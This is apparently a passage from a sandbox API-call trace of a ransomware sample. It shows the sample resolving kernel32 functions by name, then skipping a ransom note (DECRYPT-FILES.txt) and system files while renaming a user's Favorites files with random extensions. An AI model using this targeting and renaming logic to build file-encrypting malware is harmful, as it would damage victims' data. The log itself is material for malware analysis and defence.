lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.519] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.519] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.519] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.519] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.519] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.519] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.519] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.519] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.519] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.519] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.519] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.519] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.519] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.520] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.520] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.520] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.520] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.520] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.520] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.520] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.520] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.520] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.520] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.520] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.520] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.520] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.520] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.520] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.520] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.520] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.520] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.520] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.521] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.521] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.521] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.521] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.521] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.521] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.521] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.521] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.521] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.521] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.521] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.521] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.521] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.521] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.521] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.521] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.521] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.521] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.521] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.521] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.522] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.522] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.522] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.522] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.522] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.522] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.522] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.522] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.522] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.522] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.522] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.522] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.522] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.522] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.522] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.522] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.522] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.522] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.522] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.523] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.523] lstrlenA (lpString="DELETEATOM") returned 10 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.523] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.523] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.523] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.523] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.523] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.523] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.523] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.523] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.523] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.523] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.523] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.523] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.523] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.523] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.523] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.523] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.523] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.523] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.524] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.524] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.527] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.527] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.527] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.527] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.527] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.527] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.527] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.527] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.527] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.528] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.528] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.528] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.528] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.528] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.528] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.528] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.528] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.528] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.528] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.528] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.528] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.528] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.528] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.528] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.528] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG") returned 87 [0185.529] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG.6UQAi") returned 93 [0185.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.gutycg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG.6UQAi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.gutycg.6uqai"), dwFlags=0x0) returned 1 [0185.529] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.530] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.530] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.530] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee6f440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url.gutyCG", cAlternateFileName="MICROS~2.GUT")) returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="DECRYPT-FILES.txt") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="autorun.inf") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="boot.ini") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="desktop.ini") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="ntuser.dat") returned -1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="iconcache.db") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="bootsect.bak") returned 1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="ntuser.dat.log") returned -1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="thumbs.db") returned -1 [0185.530] lstrcmpiW (lpString1="Microsoft At Work.url.gutyCG", lpString2="Bootfont.bin") returned 1 [0185.530] lstrlenW (lpString="Microsoft At Work.url.gutyCG") returned 28 [0185.530] lstrcmpiW (lpString1="gutyCG", lpString2="lnk") returned -1 [0185.530] lstrcmpiW (lpString1="gutyCG", lpString2="exe") returned 1 [0185.530] lstrcmpiW (lpString1="gutyCG", lpString2="sys") returned -1 [0185.530] lstrcmpiW (lpString1="gutyCG", lpString2="dll") returned 1 [0185.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.530] lstrlenW (lpString="Microsoft At Work.url.gutyCG") returned 28 [0185.530] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: 